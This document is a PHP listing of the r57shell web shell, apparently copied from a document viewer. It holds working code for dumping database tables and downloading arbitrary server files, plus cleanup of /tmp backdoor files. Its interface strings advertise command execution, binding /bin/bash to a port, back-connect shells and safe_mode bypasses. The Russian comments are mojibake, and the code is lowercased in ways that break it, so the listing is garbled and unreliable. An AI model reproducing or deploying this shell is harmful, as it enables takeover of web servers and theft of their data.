Вы находитесь на странице: 1из 20

<?

php
/*********************************************************************************
*********************/
/*
/* # # # #

/* # # # #
/* # # # #
/* # ## #### ## #
/* ## ## ###### ## ##
/* ## ## ###### ## ##
/* ## ## #### ## ##
/* ### ############ ###
/* ########################
/* ##############
/* ######## ########## #######
/* ### ## ########## ## ###
/* ### ## ########## ## ###
/* ### # ########## # ###
/* ### ## ######## ## ###
/* ## # ###### # ##
/* ## # #### # ##
/* ## ##
/*
/*
/*
/* r57shell.php - ������ �� ��� ���������� ��� �������� ��������� ������� ��
������� ����� �������
/* �� ������ ������� ���� ����� �� ����� �����: http://rst.void.ru
/* �����: 1.31
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~*/
/* �������� ������������� �� ������ � ����: blf, phoenix, virus, nord � ����
����� �� Rst/ghc.
/* ���� � ��� ���� �����-���� ���� �� ������ ���� ����� ������� ������� ��������
� ������ �� ������
/* �� rst@void.ru. ��� ���������� ����� �����������.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* rst/ghc http://rst.void.ru , http://ghc.ru
/* any modified republishing is restricted
/*********************************************************************************
*********************/
/* ~~~ ��������� | options ~~~ */

// ����� ����� | language


// $language='ru' - ������� (russian)
// $language='eng' - english (����������)
$language='ru';

// ������������� | authentification
// $auth = 1; - ������������� ������� ( authentification = on )
// $auth = 0; - ������������� �������� ( authentification = off )
$auth = 0;

// ����� � ������ �� ������� � ������� (login & password for access)


// �� �������� ������� ����� ����������� �� �������!!! (change this!!!)
// ����� � ������ ������� � ������ ��������� md5, ������� �� �������� 'r57'
// login & password crypted with md5, default is 'r57'
$name='ec371748dc2da624b35a4f8f685dd122'; // ����� ����������� (user login)
$pass='ec371748dc2da624b35a4f8f685dd122'; // ������ ����������� (user password)
/*********************************************************************************
*********************/
error_reporting(e_all);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = '1.31';
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_post = &$http_post_vars;
$_get = &$http_get_vars;
$_server = &$http_server_vars;
$_cookie = &$http_cookie_vars;
}
if (@get_magic_quotes_gpc())
{
foreach ($_post as $k=>$v)
{
$_post[$k] = stripslashes($v);
}
foreach ($_cookie as $k=>$v)
{
$_cookie[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_server['php_auth_user']) || md5($_server['php_auth_user'])!==$name ||
md5($_server['php_auth_pw'])!==$pass)
{
header('www-authenticate: basic realm="r57shell"');
header('http/1.0 401 unauthorized');
exit("<b><a href=http://rst.void.ru>r57shell</a> : access denied</b>");
}
}
$head = '<!-- ����������, ��� -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1251">

<style>
tr {
border-right: #aaaaaa 1px solid;
border-top: #eeeeee 1px solid;
border-left: #eeeeee 1px solid;
border-bottom: #aaaaaa 1px solid;
color: #000000;
}
td {
border-right: #aaaaaa 1px solid;
border-top: #eeeeee 1px solid;
border-left: #eeeeee 1px solid;
border-bottom: #aaaaaa 1px solid;
color: #000000;
}
.table1 {
border: 0px;
background-color: #d4d0c8;
color: #000000;
}
.td1 {
border: 0px;
font: 7pt verdana;
color: #000000;
}
.tr1 {
border: 0px;
color: #000000;
}
table {
border: #eeeeee 1px outset;
background-color: #d4d0c8;
color: #000000;
}
input {
border-right: #ffffff 1px solid;
border-top: #999999 1px solid;
border-left: #999999 1px solid;
border-bottom: #ffffff 1px solid;
background-color: #e4e0d8;
font: 8pt verdana;
color: #000000;
}
select {
border-right: #ffffff 1px solid;
border-top: #999999 1px solid;
border-left: #999999 1px solid;
border-bottom: #ffffff 1px solid;
background-color: #e4e0d8;
font: 8pt verdana;
color: #000000;;
}
submit {
border: buttonhighlight 2px outset;
background-color: #e4e0d8;
width: 30%;
color: #000000;
}
textarea {
border-right: #ffffff 1px solid;
border-top: #999999 1px solid;
border-left: #999999 1px solid;
border-bottom: #ffffff 1px solid;
background-color: #e4e0d8;
font: fixedsys bold;
color: #000000;
}
body {
margin: 1px;
color: #000000;
background-color: #e4e0d8;
}
a:link {color:red; text-decoration: none}
a:visited { color:red; text-decoration: none}
a:active {color:red; text-decoration: none}
a:hover {color:blue;text-decoration: none}
</style>
<script language=\'javascript\'>
function hide_div(id)
{
document.getelementbyid(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getelementbyid(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getelementbyid(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2dostime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) |
($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) |
($timearray['seconds'] >> 1);
}
function addfile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2dostime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('v', $crc);
$fr .= pack('v', $c_len);
$fr .= pack('v', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('v', $crc);
$cdrec .= pack('v', $c_len);
$cdrec .= pack('v', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 32 );
$cdrec .= pack('v', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', strlen($ctrldir)) .
pack('v', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addfile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "from: $from\r\n";
$headers .= "mime-version: 1.0\r\n";
$headers .= "content-type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "content-transfer-encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(@mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;

function connect()
{
switch($this->db)
{
case 'mysql':
if(empty($this->port)) { $this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this-
>user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'mssql':
if(empty($this->port)) { $this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this-
>user,$this->pass);
if($this->connection) return 1;
break;
case 'postgresql':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."'
password='".$this->pass."' dbname='".$this->base."'";
if(!function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'oracle':
if(!function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;

function select_db()
{
switch($this->db)
{
case 'mysql':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'mssql':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'postgresql':
return 1;
break;
case 'oracle':
return 1;
break;
}
return 0;
}

function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'mysql':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this-
>connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'mssql':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'postgresql':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'mysql':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return
1;}
break;
case 'mssql':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return
1;};
break;
case 'postgresql':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return
1;}
break;
case 'oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this-
>num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## created: '.date ("d/m/y h:i:s");
$this->dump[3] = '## database: '.$this->base;
$this->dump[4] = '## table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'mysql':
$this->dump[0] = '## mysql dump';
if($this->query('/*'.chr(0).'*/ show create table `'.$table.'`')!=1) return
0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['create table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ select * from `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] =
@mysql_real_escape_string($v);}
$this->dump[] = 'insert into `'.$table.'` (`'.@implode("`, `", $this-
>columns).'`) values (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'mssql':
$this->dump[0] = '## mssql dump';
if($this->query('select * from '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'insert into '.$table.' ('.@implode(", ", $this-
>columns).') values (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'postgresql':
$this->dump[0] = '## postgresql dump';
if($this->query('select * from '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'insert into '.$table.' ('.@implode(", ", $this-
>columns).') values (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'oracle':
$this->dump[0] = '## oracle dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'mysql':
@mysql_close($this->connection);
break;
case 'mssql':
@mssql_close($this->connection);
break;
case 'postgresql':
@pg_close($this->connection);
break;
case 'oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'mysql':
return @mysql_affected_rows($this->res);
break;
case 'mssql':
return @mssql_affected_rows($this->res);
break;
case 'postgresql':
return @pg_affected_rows($this->res);
break;
case 'oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_post['cmd']) && $_post['cmd']=="download_file" && !
empty($_post['d_name']))
{
if(!$file=@fopen($_post['d_name'],"r")) { err(1,$_post['d_name']);
$_post['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_post['d_name']);
$filedump = @fread($file,@filesize($_post['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_post['compress']);
if (!empty($content_encoding)) { header('content-encoding: ' .
$content_encoding); }
header("content-type: ".$mime_type);
header("content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_get['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font
face=verdana size=-2><b>[ <a href=".$_server['php_self'].">back</a> ]
</b></font></div>"; die(); }
if (!empty($_post['cmd']) && $_post['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_post['db'];
$sql->host = $_post['db_server'];
$sql->port = $_post['db_port'];
$sql->user = $_post['mysql_l'];
$sql->pass = $_post['mysql_p'];
$sql->base = $_post['mysql_db'];
$querys = @explode(';',$_post['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect()) echo "<div align=center><font face=verdana size=-2
color=red><b>can't connect to sql server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font
face=verdana size=-2 color=red><b>can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=verdana size=-2 color=green><b>query#".$num." :
".htmlspecialchars($query,ent_quotes)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=verdana size=-2>error :
<b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] =
htmlspecialchars($v,ent_quotes);
$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font
face=verdana size=-2><b>&nbsp;", $sql->columns);
echo "<tr><td bgcolor=#cccccc><font face=verdana size=-
2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] =
htmlspecialchars($v,ent_quotes);
$values = @implode("&nbsp;</font></td><td><font face=verdana size=-
2>&nbsp;",$sql->rows[$i]);
echo '<tr><td><font face=verdana size=-
2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=verdana size=-2>affected rows :
<b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=post>";
echo in('hidden','db',0,$_post['db']);
echo in('hidden','db_server',0,$_post['db_server']);
echo in('hidden','db_port',0,$_post['db_port']);
echo in('hidden','mysql_l',0,$_post['mysql_l']);
echo in('hidden','mysql_p',0,$_post['mysql_p']);
echo in('hidden','mysql_db',0,$_post['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=verdana size=-2><b>base: </b><input type=text name=mysql_db
value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10
name=db_query>".(!empty($_post['db_query'])?($_post['db_query']):("show
databases;\nselect * from user;"))."</textarea><br><input type=submit name=submit
value=\" run sql query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>"; die();
}
if(isset($_get['delete']))
{
@unlink(__file__);
}
if(isset($_get['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_get['phpini']))
{
echo $head;
function u_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'true' : 'false';
if ($value === null) return 'null';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return u_wordwrap((string) $value);
}
function u_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=verdana size=-2
color=red><div align=center><b>directive</b></div></font></td><td
bgcolor=#cccccc><font face=verdana size=-2 color=red><div align=center><b>local
value</b></div></font></td><td bgcolor=#cccccc><font face=verdana size=-2
color=red><div align=center><b>master value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=verdana size=-
2><b>'.$key.'</b></font></td><td><font face=verdana size=-2><div
align=center><b>'.u_value($value['local_value']).'</b></div></font></td><td><font
face=verdana size=-2><div
align=center><b>'.u_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
if(isset($_get['cpu']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font
face=verdana size=-2 color=red><b>cpu</b></font></div></td></tr></table><table
width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=verdana size=-
2><b>'.trim($info[0]).'</b></font></td><td><font face=verdana size=-2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=verdana size=-2><b> ---
</b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
if(isset($_get['mem']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font
face=verdana size=-2 color=red><b>memory</b></font></div></td></tr></table><table
width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=verdana size=-
2><b>'.trim($info[0]).'</b></font></td><td><font face=verdana size=-2><div
align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=verdana size=-2><b> ---
</b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=verdana size=-2><b>[ <a
href=".$_server['php_self'].">back</a> ]</b></font></div>";
die();
}
/*
����� �����
$language='ru' - �������
$language='eng' - ����������
*/
$language='eng';
$lang=array(
'ru_text1' =>'���������� �������',
'ru_text2' =>'���������� ������ �� �������',
'ru_text3' =>'��������� �������',
'ru_text4' =>'������ ���������',
'ru_text5' =>'�������� ������ �� ������',
'ru_text6' =>'��������� ����',
'ru_text7' =>'������',
'ru_text8' =>'�������� �����',
'ru_butt1' =>'���������',
'ru_butt2' =>'���������',
'ru_text9' =>'�������� ����� � ������� ��� � /bin/bash',
'ru_text10'=>'������� ����',
'ru_text11'=>'������ �� �������',
'ru_butt3' =>'�������',
'ru_text12'=>'back-connect',
'ru_text13'=>'ip-�����',
'ru_text14'=>'����',
'ru_butt4' =>'���������',
'ru_text15'=>'�������� ������ � ���������� �������',
'ru_text16'=>'������������',
'ru_text17'=>'��������� ����',
'ru_text18'=>'��������� ����',
'ru_text19'=>'exploits',
'ru_text20'=>'������������',
'ru_text21'=>'����� ��',
'ru_text22'=>'datapipe',
'ru_text23'=>'��������� ����',
'ru_text24'=>'��������� ����',
'ru_text25'=>'��������� ����',
'ru_text26'=>'������������',
'ru_butt5' =>'���������',
'ru_text28'=>'������ � safe_mode',
'ru_text29'=>'������ ��������',
'ru_butt6' =>'�������',
'ru_text30'=>'�������� �����',
'ru_butt7' =>'�������',
'ru_text31'=>'���� �� ������',
'ru_text32'=>'���������� php ����',
'ru_text33'=>'�������� ����������� ������ ����������� open_basedir ����� �������
curl',
'ru_butt8' =>'���������',
'ru_text34'=>'�������� ����������� ������ ����������� safe_mode ����� ������
include',
'ru_text35'=>'�������� ����������� ������ ����������� safe_mode ����� ��������
����� � mysql',
'ru_text36'=>'���� . �������',
'ru_text37'=>'�����',
'ru_text38'=>'������',
'ru_text39'=>'����',
'ru_text40'=>'���� ������� ���� ������',
'ru_butt9' =>'����',
'ru_text41'=>'��������� � �����',
'ru_text42'=>'�������������� �����',
'ru_text43'=>'������������� ����',
'ru_butt10'=>'���������',
'ru_butt11'=>'�������������',
'ru_text44'=>'�������������� ����� ����������! ������ ������ �� �����!',
'ru_text45'=>'���� ��������',
'ru_text46'=>'�������� phpinfo()',
'ru_text47'=>'�������� �������� php.ini',
'ru_text48'=>'�������� ��������� ������',
'ru_text49'=>'�������� ������� � �������',
'ru_text50'=>'��������� � ����������',
'ru_text51'=>'��������� � �����',
'ru_text52'=>'����� �� ������',
'ru_text53'=>'������ � �����',
'ru_text54'=>'����� ������ � ������',
'ru_butt12'=>'�����',
'ru_text55'=>'������ � ������',
'ru_text56'=>'������ �� �������',
'ru_text57'=>'�������/������� ����/���������',
'ru_text58'=>'��',
'ru_text59'=>'����',
'ru_text60'=>'���������',
'ru_butt13'=>'�������/�������',
'ru_text61'=>'���� ������',
'ru_text62'=>'��������� �������',
'ru_text63'=>'���� ������',
'ru_text64'=>'��������� �������',
'ru_text65'=>'�������',
'ru_text66'=>'�������',
'ru_text67'=>'chown/chgrp/chmod',
'ru_text68'=>'�������',
'ru_text69'=>'��������1',
'ru_text70'=>'��������2',
'ru_text71'=>"������ �������� �������:\r\n- �� chown - �� ������ ����������� ���
��� uid (������) \r\n- �� ������� CHGrp - �� ������ ��� gid (������) \r\n- ��
������� CHMod - ����� ����� � ������������ ������������� (�������� 0777)",
'ru_text72'=>'����� �� ������',
'ru_text73'=>'������ � �����',
'ru_text74'=>'������ � ������',
'ru_text75'=>'* ����� ������������ ��������� ���������',
'ru_text76'=>'����� ������ � ������ � ������ ������� find',
'ru_text80'=>'���',
'ru_text81'=>'����',
'ru_text82'=>'���� ������',
'ru_text83'=>'���������� sql �������',
'ru_text84'=>'sql ������',
'ru_text85'=>'�������� ����������� ������ ����������� safe_mode ����� ����������
������ � Mssql �������',
'ru_text86'=>'���������� ����� � �������',
'ru_butt14'=>'�������',
'ru_text87'=>'���������� ������ � ���������� ftp-�������',
'ru_text88'=>'ftp-������:����',
'ru_text89'=>'���� �� ftp �������',
'ru_text90'=>'����� ��������',
'ru_text91'=>'������������ �',
'ru_text92'=>'��� ���������',
'ru_text93'=>'ftp',
'ru_text94'=>'ftp-��������',
'ru_text95'=>'������ �������������',
'ru_text96'=>'�� ������� �������� ������ �������������',
'ru_text97'=>'��������� ����������: ',
'ru_text98'=>'������� ����������: ',
'ru_text99'=>'* � �������� ������ � ����� ����������� �� ����������� ��
/etc/passwd',
'ru_text100'=>'�������� ������ �� ��������� ��� ������',
'ru_text101'=>'������������ ����� ������������ (user -> resu) �� ����������� �
�������� �����',
'ru_text102'=>'�����',
'ru_text103'=>'�������� ������',
'ru_text104'=>'�������� ����� �� �������� ����',
'ru_text105'=>'����',
'ru_text106'=>'��',
'ru_text107'=>'����',
'ru_butt15'=>'���������',
'ru_text108'=>'����� ������',
'ru_text109'=>'��������',
'ru_text110'=>'����������',
'ru_text111'=>'sql-������ : ����',
'ru_text112'=>'�������� ����������� ������ ����������� safe_mode �����
������������� ������� mb_send_mail',
'ru_text113'=>'�������� ����������� ������ ����������� safe_mode, ��������
�������� ���������� � �������������� imap_list',
'ru_text114'=>'�������� ����������� ������ ����������� safe_mode, ��������
����������� ����� � �������������� imap_body',
'ru_text115'=>'�������� ����������� ������ ����������� safe_mode, �����������
������ � compress.zlib:// � copy()',
'ru_text116'=>'���������� ����',
'ru_text117'=>'�',
'ru_text118'=>'���� ����������',
'ru_text119'=>'�� ������� ����������� ����',
'ru_err0'=>'������! �� ���� �������� � ���� ',
'ru_err1'=>'������! �� ���� ��������� ���� ',
'ru_err2'=>'������! �� ������� ������� ',
'ru_err3'=>'������! �� ������� ���������� � ftp �������',
'ru_err4'=>'������ ����������� �� ftp �������',
'ru_err5'=>'������! �� ������� ������� ��������� �� ftp �������',
'ru_err6'=>'������! �� ������� ��������� ������',
'ru_err7'=>'������ ����������',
/* --------------------------------------------------------------- */
'eng_text1' =>'executed command',
'eng_text2' =>'execute command on server',
'eng_text3' =>'run command',
'eng_text4' =>'work directory',
'eng_text5' =>'upload files on server',
'eng_text6' =>'local file',
'eng_text7' =>'aliases',
'eng_text8' =>'select alias',
'eng_butt1' =>'execute',
'eng_butt2' =>'upload',
'eng_text9' =>'bind port to /bin/bash',
'eng_text10'=>'port',
'eng_text11'=>'password for access',
'eng_butt3' =>'bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'ip',
'eng_text14'=>'port',
'eng_butt4' =>'connect',
'eng_text15'=>'upload files from remote server',
'eng_text16'=>'with',
'eng_text17'=>'remote file',
'eng_text18'=>'local file',
'eng_text19'=>'exploits',
'eng_text20'=>'use',
'eng_text21'=>'&nbsp;new name',
'eng_text22'=>'datapipe',
'eng_text23'=>'local port',
'eng_text24'=>'remote host',
'eng_text25'=>'remote port',
'eng_text26'=>'use',
'eng_butt5' =>'run',
'eng_text28'=>'work in safe_mode',
'eng_text29'=>'access denied',
'eng_butt6' =>'change',
'eng_text30'=>'cat file',
'eng_butt7' =>'show',
'eng_text31'=>'file not found',
'eng_text32'=>'eval php code',
'eng_text33'=>'test bypass open_basedir with curl functions',
'eng_butt8' =>'test',
'eng_text34'=>'test bypass safe_mode with include function',
'eng_text35'=>'test bypass safe_mode with load file in mysql',
'eng_text36'=>'database . table',
'eng_text37'=>'login',
'eng_text38'=>'password',
'eng_text39'=>'database',
'eng_text40'=>'dump database table',
'eng_butt9' =>'dump',
'eng_text41'=>'save dump in file',
'eng_text42'=>'edit files',
'eng_text43'=>'file for edit',
'eng_butt10'=>'save',
'eng_text44'=>'can\'t edit file! only read access!',
'eng_text45'=>'file saved',
'eng_text46'=>'show phpinfo()',
'eng_text47'=>'show variables from php.ini',
'eng_text48'=>'delete temp files',
'eng_butt11'=>'edit file',
'eng_text49'=>'delete script from server',
'eng_text50'=>'view cpu info',
'eng_text51'=>'view memory info',
'eng_text52'=>'find text',
'eng_text53'=>'in dirs',
'eng_text54'=>'find text in files',
'eng_butt12'=>'find',
'eng_text55'=>'only in files',
'eng_text56'=>'nothing :(',
'eng_text57'=>'create/delete file/dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'create/delete',
'eng_text61'=>'file created',
'eng_text62'=>'dir created',
'eng_text63'=>'file deleted',
'eng_text64'=>'dir deleted',
'eng_text65'=>'create',
'eng_text66'=>'delete',
